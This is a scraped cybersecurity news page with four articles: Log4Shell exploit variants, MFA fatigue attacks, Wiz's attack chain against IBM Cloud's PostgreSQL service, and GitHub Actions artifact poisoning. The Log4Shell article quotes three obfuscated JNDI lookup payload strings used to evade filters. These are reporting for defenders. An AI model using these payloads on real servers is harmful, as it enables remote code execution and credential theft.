Connect with us

Cyber Security

Log4Shell Is Spawning Even Nastier Mutations

Published

on

The cybersecurity Hiroshima of the year – the Apache Log4j logging library exploit – has spun off 60 bigger mutations in less than a day, researchers said.

The internet has a fast-spreading, malignant cancer – otherwise known as the Apache Log4j logging library exploit – that’s been rapidly mutating and attracting swarms of attackers since it was publicly disclosed last week.

Most of the attacks focus on cryptocurrency mining done on victims’ dimes, as seen by Sophos, Microsoft and other security firms. However, attackers are actively trying to install far more dangerous malware on vulnerable systems as well.

According to Microsoft researchers, beyond coin-miners, they’ve also seen installations of Cobalt Strike, which attackers can use to steal passwords, creep further into compromised networks with lateral movement and exfiltrate data.

Also, it could get a lot worse. Cybersecurity researchers at Check Point warned on Monday that the evolution has already led to more than 60 bigger, brawnier mutations, all spawned in less than a day.

“Since Friday we witnessed what looks like an evolutionary repression, with new variations of the original exploit being introduced rapidly: over 60 in less than 24 hours,” they said.

The flaw, which is uber-easy to exploit, has been named Log4Shell. It’s resident in the ubiquitous Java logging library Apache Log4j and could allow unauthenticated remote code execution (RCE) and complete server takeover. It first turned up on sites that cater to users of the world’s favorite game, Minecraft, last Thursday, and was being exploited in the wild within hours of public disclosure.

Mutations May Enable Exploits to Slip Past Protections

On Monday, Check Point reported that Log4Shell’s new, malignant offspring can now be exploited “either over HTTP or HTTPS (the encrypted version of browsing),” they said.

The more ways to exploit the vulnerability, the more alternatives attackers have to slip past the new protections that have frantically been pumped out since Friday, Check Point said. “It means that one layer of protection is not enough, and only multilayered security postures would provide a resilient protection,” they wrote.

Because of the enormous attack surface it poses, some security experts are calling Log4Shell the biggest cybersecurity calamity of the year, putting it on par with the 2014 Shellshock family of security bugs that was exploited by botnets of compromised computers to perform distributed denial-of-service (DDoS) attacks and vulnerability scanning within hours of its initial disclosure.

Tactical Shifts

Besides variations that can slip past protections, researchers are also seeing new tactics.

Luke Richards, Threat Intelligence Lead at AI cybersecurity firm Vectra, told Threatpost on Monday that initial exploit attempts were basic call backs, with the initial exploit attempt coming from TOR nodes. They mostly pointed back to “bingsearchlib[.]com,” with the exploit being passed into the User Agent or the Uniform Resource Identifier (URI) of the request.

But since the initial wave of exploit attempts, Vectra has tracked many changes in tactics by the threat actors who are leveraging the vulnerability. Notably, there’s been a shift in the commands being used, as the threat actors have begun obfuscating their requests.

“This originally included stuffing the User Agent or URI with a base64 string, which when decoded by the vulnerable system caused the host to download a malicious dropper from attacker infrastructure,” Richards explained in an email. Following this, the attackers started obfuscating the Java Naming and Directory Interface (JDNI) string itself, by taking advantage of other translation features of the JDNI process.

He offered these examples:

${jndi:${lower:l}${lower:d}a${lower:p}://world80
${${env:ENV_NAME:-j}n${env:ENV_NAME:-d}i${env:ENV_NAME:-:}${env:ENV_NAME:-l}d${env:ENV_NAME:-a}p${env:ENV_NAME:-:}//
${jndi:dns://

…All of which achieve the same objective: “to download a malicious class file and drop it onto the target system, or to leak credentials of cloud-based systems,” Richards said.

Bug Has Been Targeted All Month

Attackers have been buzzing around the Log4Shell vulnerability since at least Dec. 1, it turns out, and as soon as CVE-2021-44228 was publicly disclosed late last week, attackers began to swarm around honeypots.

On Sunday, Sophos researchers said that they’d “already detected hundreds of thousands of attempts since December 9 to remotely execute code using this vulnerability,” noting that log searches by other organizations (including Cloudflare) suggest that the vulnerability may have been openly exploited for weeks.

“Earliest evidence we’ve found so far of #Log4J exploit is 2021-12-01 04:36:50 UTC,” Cloudflare CEO Matthew Prince tweeted on Saturday. “That suggests it was in the wild at least nine days before publicly disclosed. However, don’t see evidence of mass exploitation until after public disclosure.”

On Sunday, Cisco Talos chimed in with a similar timeframe: It first saw attacker activity related to CVE-2021-44228 starting on Dec. 2. “It is recommended that organizations expand their hunt for scanning and exploit activity to this date,” it advised.

Exploits Attempted on 40% of Corporate Networks

Check Point said on Monday that it’s thwarted more than 845,000 exploit attempts, with more than 46 percent of those attempts made by known, malicious groups. In fact, Check Point warned that it’s seen more than 100 attempts to exploit the vulnerability per minute.

As of 9 a.m. ET on Monday, its researchers had seen exploits attempted on more than 40 percent of corporate networks globally.

The map below illustrates the top targeted geographies.

Top affected geographies. Source: Check Point.

Hyperbole isn’t an issue with this flaw. Security experts are rating it as one of the worst vulnerabilities of 2021, if not the tip-top most terrible. Dor Dali, Director of Information Security at Vulcan Cyber, classes it in the top-three worst flaws of the year: “It wouldn’t be a stretch to say that every enterprise organization uses Java, and Log4j is one of the most-popular logging frameworks for Java,” Dali noted via email on Monday. “Connecting the dots, the impact of this vulnerability has the reach and potential to be substantial if mitigation efforts aren’t taken right away.”

As has been repeatedly stressed since its initial public disclosure, the Log4j vulnerability “is relatively easy to exploit, and we’ve already seen verifiable reports that bad actors are actively running campaigns against some of the largest companies in the world,” Dali reiterated. “Hopefully every organization running Java has the ability to secure, configure and manage it. If Java is being used in production systems IT security teams must prioritize the risk and mitigation campaigns and follow remediation guidelines from the Apache Log4j project as soon as possible.”

This situation is rapidly evolving, so keep an eye out for additional news. Below are some of the related pieces we’ve seen, along with some of the new protections and detection tools.

More News

New Protections, Detection Tools

  • On Saturday, Huntress Labs released a tool – available here – to help organizations test whether their applications are vulnerable to CVE-2021-44228.
  • Cybereason released Logout4Shell, a “vaccine” for the Log4Shell Apache Log4j RCE, that uses the vulnerability itself to set the flag that turns it off.

Growing List of Affected Manufacturers, Components

As of Monday, the internet was still in meltdown drippy mode, with an ever-growing, crowd-sourced list hosted on GitHub that only scratches the surface of the millions of applications and manufacturers that use log4j for logging. The list indicates whether they’re affected by Log4Shell and provides links to evidence if they are.

Spoiler alert: Most are, including:

A Deep Dive and Other Resources

  • Immersive Labs has posted a hands-on lab of the incident.
  • Lacework has published a blog post regarding how the news affects security best practices at the developer level.
  • NetSPI has published a blog post that includes details on Log4Shell’s impact, guidance to determine whether your organization is at risk, and mitigation recommendations.

This is a developing story – stay tuned to Threatpost for ongoing coverage.

121321 13:32 UPDATE 1: Added input from Dor Dali and Luke Richards.
121321 14:15 UPDATE 2: Added additional botnets detected by NetLab 360.

There’s a sea of unstructured data on the internet relating to the latest security threats. REGISTER TODAY to learn key concepts of natural language processing (NLP) and how to use it to navigate the data ocean and add context to cybersecurity threats (without being an expert!). This LIVE, interactive Threatpost Town Hall, sponsored by Rapid 7, will feature security researchers Erick Galinkin of Rapid7 and Izzy Lazerson of IntSights (a Rapid7 company), plus Threatpost journalist and webinar host, Becky Bracken.

Register NOW for the LIVE event!



Source link

Cyber Security

Improving Cyber Hygiene with Multi-Factor Authentication and Cyber Awareness

Published

on

Using multi-factor authentication (MFA) is one of the key components of an organizations Identity and Access Management (IAM) program to maintain a strong cybersecurity posture. Having multiple layers to verify users is important, but MFA fatigue is also real and can be exploited by hackers.

Enabling MFA for all accounts is a best practice for all organizations, but the specifics of how it is implemented are significant because attackers are developing workarounds. That said, when done correctly – and with the right pieces in place – MFA is an invaluable tool in the cyber toolbox and a key piece of proper cyber hygiene. This is a primary reason why MFA was a key topic for this year’s cybersecurity awareness month. For leaders and executives, the key is to ensure employees are trained to understand the importance of the security tools – like MFA – available to them while also making the process easy for them.

MFA is still an important piece of the cyber hygiene puzzle

Multi-factor authentication (MFA) helps to provide extra layers of security throughout your organization. This quick verification serves as a tool that allows organizations to confirm identity before allowing users to access company data. This can look like prompting employees to use mobile tokens and/or to enter a specific code they’ve been texted or emailed before logging on to certain devices and websites. 

MFA fatigue is rising, and hackers are noticing

Even though MFA should be a basic requirement these days, it’s not a foolproof tactic. Attackers are finding new ways around this security layer with what are called MFA fatigue attacks.

As employees try to access work applications, they are often prompted to verify their identity in some way established by the IT security team. This typically involves notifications to their smartphones. Anyone who has been trying to complete their work in a timely manner knows the irritation of constantly having to take action on these notifications. This is the basis of the MFA fatigue attack.

Attackers excel at finding ways to gain entry to their chosen target, and they seem to know a good bit about human psychology. Attackers are now spamming employees with compromised credentials with MFA authorization requests – sometimes dozens of times in an hour – until they get so irritated that they approve the request using their authentication apps. Or they might assume there is a system malfunction and accept the notification just to make the notifications stop.

A simple, effective MFA strategy for long-term success

Getting MFA right is a balance between being strict enough so that the security measure maintains integrity and lax enough so that employees don’t grow tired of it and get tripped up.

Employees may grow irritated or think that MFA prompts are excessive as a result of frequently invalidating sessions. On the other hand, if too lenient, authenticated sessions can last too long, IP changes won’t result in new prompts, new MFA device enrollments won’t result in alerts, and enterprises run the risk of not being informed when, for instance, an authentication token that has already passed the MFA check gets stolen.

Most employees have never heard of MFA fatigue attacks, so they don’t know to look for or report them. In order to cope, organizations need to educate employees to make sure they’re prepared to spot these attacks.

Organizations need to place controls on MFA to lower the potential for MFA abuse. The most effective control is to not use methods that allow simple approvals of notifications – a scenario that contributes to MFA fatigue. All approvals should mandate responses that prove the user has the authenticated device. Number matching, for instance, is a technique that requires the user to enter a series of numbers they can see on their screen.

There’s also the effective one-time passcode (OTP) method of approval where the user gets information from the authentication request and has to enter it for verification. This requires a little more work on the user’s part, but it helps reduce the risk of MFA fatigue.

Another useful tool is an endpoint privilege management solution, which helps to stop the theft of cookies. If attackers get a hold of those cookies, they can bypass MFA controls. This solution is a robust layer in the protection of user credentials.

It’s important to set thresholds and send alerts to the SOC if certain thresholds are exceeded. The SOC can use user behavior analytics to create context-based triggers that alert the security team if any unusual behavior occurs. It can also prohibit user authentication from dubious IP addresses.

Outsmarting cyber criminals with the right security solutions and training

MFA prevents unauthorized access from cyber criminals, yet they have found a way to circumvent it by using its own premise of trust and authentication against users. That’s why organizations must use a two-pronged approach of educating employees about MFA fatigue attacks and setting up appropriate guardrails to reduce the likelihood of these attacks succeeding. Solutions like Fortinet’s FortiAuthenticator, FortiToken and FortiTrust Identity further protect organizations and strengthens their security posture. At the same time, cybersecurity awareness training, like Fortinet’s Security Awareness and Training service, can help ensure that employees are aware of all threat methods, as well as the importance of properly using all the security tools available to them.

Find out more about how Fortinet’s Training Advancement Agenda (TAA) and Training Institute programs—including the NSE Certification programAcademic Partner program, and Education Outreach program—are increasing access to training to help solve the cyber skills gap

 

Copyright © 2022 IDG Communications, Inc.

Source link

Continue Reading

Cyber Security

Researchers found security pitfalls in IBM’s cloud infrastructure

Published

on

Security researchers recently probed IBM Cloud’s database-as-a-service infrastructure and found several security issues that granted them access to the internal server used to build database images for customer deployments. The demonstrated attack highlights some common security oversights that can lead to supply chain compromises in cloud infrastructure.

Developed by researchers from security firm Wiz, the attack combined a privilege escalation vulnerability in the IBM Cloud Databases for PostgreSQL service with plaintext credentials scattered around the environment and overly permissive internal network access controls that allowed for lateral movement inside the infrastructure.

PostgreSQL is an appealing target in cloud environments

Wiz’ audit of the IBM Cloud Databases for PostgreSQL was part of a larger research project that analyzed PostgreSQL deployments across major cloud providers who offer this database engine as part of their managed database-as-a-service solutions. Earlier this year, the Wiz researchers also found and disclosed vulnerabilities in the PostgreSQL implementations of Microsoft Azure and the Google Cloud Platform (GCP).

The open-source PostgreSQL relational database engine has been in development for over 30 years with an emphasis on stability, high-availability and scalability. However, this complex piece of software was not designed with a permission model suitable for multi-tenant cloud environments where database instances need to be isolated from each other and from the underlying infrastructure.

PostgreSQL has powerful features through which administrators can alter the server file system and even execute code through database queries, but these operations are unsafe and need to be restricted in shared cloud environments. Meanwhile, other admin operations such as database replication, creating checkpoints, installing extensions and event triggers need to be available to customers for the service to be functional. That’s why cloud service providers (CSPs) had to come up with workarounds and make modifications to PostgreSQL’s permission model to enable these capabilities even when customers only operate with limited accounts.

Privilege escalation through SQL injection

While analyzing IBM Cloud’s PostgreSQL implementation, the Wiz researchers looked at the Logical Replication mechanism that’s available to users. This feature was implemented using several database functions, including one called create_subscription that is owned and executed by a database superuser called ibm.

When they inspected the code of this function, the researchers noticed an SQL injection vulnerability caused by improper sanitization of the arguments passed to it. This meant they could pass arbitrary SQL queries to the function, which would then execute those queries as the ibm superuser. The researchers exploited this flaw via the PostgreSQL COPY statement to execute arbitrary commands on the underlying virtual machine that hosted the database instance and opened a reverse shell.

With a shell on the Linux system they started doing some reconnaissance to understand their environment, such as listing running processes, checking active network connections, inspecting the contents of the /etc/passwd files which lists the system’s users and running a port scan on the internal network to discover other servers. The broad port scan caught the attention of the IBM security team who reached out to the Wiz team to ask about their activities.

“After discussing our work and sharing our thoughts with them, they kindly gave us permission to pursue our research and further challenge security boundaries, reflecting the organization’s healthy security culture,” the Wiz team said.

Stored credentials lead to supply chain attack

The gathered information, such as environment variables, told the researchers they were in a Kubernetes (K8s) pod container and after searching the file system they found a K8s API access token stored locally in a file called /var/run/secrets/kubernetes.io/serviceaccount/token. The API token allowed them to gather more information about the K8s cluster, but it turned out that all the pods were associated with their account and were operating under the same namespace. But this wasn’t a dead end.

K8s is a container orchestration system used for software deployment where containers are usually deployed from images — prebuilt packages that contain all the files needed for a container and its preconfigured services to operate. These images are normally stored on a container registry server, that can be public or private. In the case of IBM Cloud it was a private container registry that required authentication.

The researchers used the API token to read the configurations of the pods in their namespace and found the access key for four different internal container registries in those configuration files. The description of this newly found key in IBM Cloud’s identity and access management (IAM) API suggested it had both read and write privileges to the container registries, which would have given the researchers the ability to overwrite existing images with rogue ones.

However, it turned out that the key description was inaccurate and they could only download images. This level of access had security implications, but it did not pose a direct threat to other IBM Cloud customers, so the researchers pushed forward.

Container images can contain a lot of sensitive information that’s used during deployment and later gets deleted, including source code, internal scripts referencing additional services in the infrastructure, as well as credentials needed to access them. Therefore, the researchers decided to download all images from the registry service and use an automated tool to scan them for secrets, such as credentials and API tokens.

“In order to comprehensively scan for secrets, we unpacked the images and examined the combination of files that made up each image,” the researchers said. “Container images are based on one or more layers; each may inadvertently include secrets. For example, if a secret exists in one layer but is deleted from the following layer, it would be completely invisible from within the container. Scanning each layer separately may therefore reveal additional secrets.”

The JSON manifest files of container images have a “history” section that lists historical commands that were executed during the build process of every image. In several such files, the researchers found commands that had passwords passed to them as command line arguments. These included passwords for an IBM Cloud internal FTP server and a build artifact repository.

Finally, the researchers tested if they could access those servers from within their container and it turned out that they could. This overly permissive network access combined with the extracted credentials allowed them to overwrite arbitrary files in the build artifact repository that’s used by the automated IBM Cloud build process to create container images. Those images are then used in customer deployments, opening the door to a supply chain attack.

“Our research into IBM Cloud Databases for PostgreSQL reinforced what we learned from other

cloud vendors, that modifications to the PostgreSQL engine effectively introduced new

vulnerabilities to the service,” the researchers said. “These vulnerabilities could have been exploited by a malicious actor as part of an extensive exploit chain culminating in a supply-chain attack on the platform.”

Lessons for other organizations

While all of these issues have already been privately reported to and fixed by the IBM Cloud team, they are not unique to IBM. According to the Wiz team, the “scattered secrets” issue is common across all cloud environments.

Automated build and deployment workflows often leave secrets behind in various places such as configuration files, Linux bash history, journal files and so on that developers forget to wipe when deployment is complete. Furthermore, some developers accidentally upload their whole .git and CircleCI configuration files to production servers. Forgotten secrets commonly found by the Wiz team include cloud access keys, passwords, CI/CD credentials and API access tokens.

Another prevalent issue that played a critical role in the IBM Cloud attack is the lack of strict access controls between production servers and internal CI/CD systems. This often allows attackers to move laterally and gain a deeper foothold into an organization’s infrastructure.

Finally, private container registries can provide a wealth of information to attackers that goes beyond credentials. They can reveal information about critical servers inside the infrastructure or can contain code that reveals additional vulnerabilities. Organizations should make sure their container registry solutions enforce proper access controls and scoping, the Wiz team said.

Copyright © 2022 IDG Communications, Inc.

Source link

Continue Reading

Cyber Security

Software projects face supply chain security risk due to insecure artifact downloads via GitHub Actions

Published

on

The way build artifacts are stored by the GitHub Actions platform could enable attackers to inject malicious code into software projects with CI/CD (continuous integration and continuous delivery) workflows that don’t perform sufficient filtering when downloading artifacts. Cybersecurity researchers have identified several popular artifacts download scripts used by thousands of repositories that are vulnerable to this issue.

“We have discovered that when transferring artifacts between different workflows, there is a major risk for artifact poisoning — a technique in which attackers replace the content of a legitimate artifact with a modified malicious one and thereby initiate a supply chain attack,” researchers from supply chain security firm Legit Security said in an analysis of the issue.

To attack a vulnerable project’s CI/CD pipeline that downloads and uses artifacts generated by other workflows, attackers only need to fork the repositories containing those workflows, modify them in their local copies so they produce rogue artifacts and then make pull requests back to the original repositories without those requests having to be accepted.

A logic flaw in artifact storage APIs

GitHub Actions is a CI/CD platform for automating the building and testing of software code. The service is free for public repositories and includes free minutes of worker run time and storage space for private repositories. It’s widely adopted by projects that use GitHub to host and manage their source code repositories.

GitHub Actions workflows are automated processes defined in .yml files using YAML syntax that get executed when certain triggers or events occur, such as when new code gets committed to the repository. Build artifacts are compiled binaries, logs and other files that result from the execution of a workflow and its individual jobs. These artifacts are saved inside storage buckets with each workflow run being assigned a particular bucket where it can upload files and later download them from.

The reference “action” (script) for downloading artifacts that’s provided by GitHub doesn’t support cross-workflow artifact downloads, but reusing artifacts generated by different workflows as input for follow-up build steps are common use cases for software projects. That’s why developers have created their own custom scripts that rely on the GitHub Actions API to download artifacts using more complex filtering, such as artifacts created by a specific workflow file, a specific user, a specific branch and so on.

The problem that Legit Security found is that the API doesn’t differentiate between artifacts uploaded by forked repositories and base repositories, so if a download script filters artifacts generated by a particular workflow file from a particular repository, the API will serve the latest version of the artifact generated by that file, but this could be a malicious version generated automatically via a pull request action from a forked version of the repository.

“To put it simply: in a vulnerable workflow, any GitHub user can create a fork that builds an artifact,” the researchers said. “Then inject this artifact into the original repository build process and modify its output. This is another form of a software supply chain attack, where the build output is modified by an attacker.

The researchers found four custom actions developed by the community for downloading artifacts that were all vulnerable. One of them was listed as a dependency for over 12,000 repositories.

The Rust example

One of the repositories that used such a custom script in one of its workflows was the official repository for the Rust programming language. The vulnerable workflow, called ci.yml was responsible for building and testing the repository’s code and used the custom action to download an artifact called libgccjit.so — a Linux library file — that was generated by a workflow in a third-party repository.

All attackers had to do was fork the third-party repository, modify the workflow from that repository to generate a malicious version of the library and issue a pull request to the original repository to generate the artifact. If Rust’s workflow would have then pulled in the poisoned version of the library it would have provided the attackers with the ability to execute malicious code within the Rust repository with the workflow’s privileges.

“Upon exploitation, the attacker could modify the repository branches, pull requests, issues, releases, and all of the entities that are available for the workflow token permissions,” the researchers said.

Users need to enforce stricter filtering for artifact downloads

GitHub responded to Legit’s report by adding more filtering capabilities to the API which developers can use to better identify artifacts created by a specific run instance of the workflow (workflow run id). However, this change cannot be forced onto existing implementations without breaking workflows, so it’s up to users to update their workflows with stricter filtering in order to be protected.

Another mitigation is to filter the downloaded artifacts by the hash value of the commits that generated them or by excluding artifacts created by pull-request entirely using the exclude_pull_requests option. Legit Security also contacted the authors of the vulnerable custom artifact download scripts they found.

“In supply chain security, the focus has been on preventing people from contributing malicious code, so every time you do a change in a repository, create a pull request or do a change request, GitHub has a lot of built-in verification controls,” Liav Caspi, CTO of Legit Security tells CSO. “Somebody has to approve your code, somebody has to merge it, so there’s a person involved. What we’ve been trying to find are techniques that exploit a logic problem that any person could influence without review and I think this is one of them. If someone would have known about it, they could have injected the artifact without any approval.”

Typically, CI pipelines have workflows that run automatically on pull requests to test the code before it’s manually reviewed and if the pull request contains any artifact that needs to be built, the workflow will build it, Caspi said. A sophisticated attacker could create the pull request to get the artifact built and then delete the request by closing the submission and chances are with all the activity noise that exists in source code repositories today, it would go unnoticed, he said.

Copyright © 2022 IDG Communications, Inc.

Source link

Continue Reading

Trending

URGENT: CYBER SECURITY UPDATE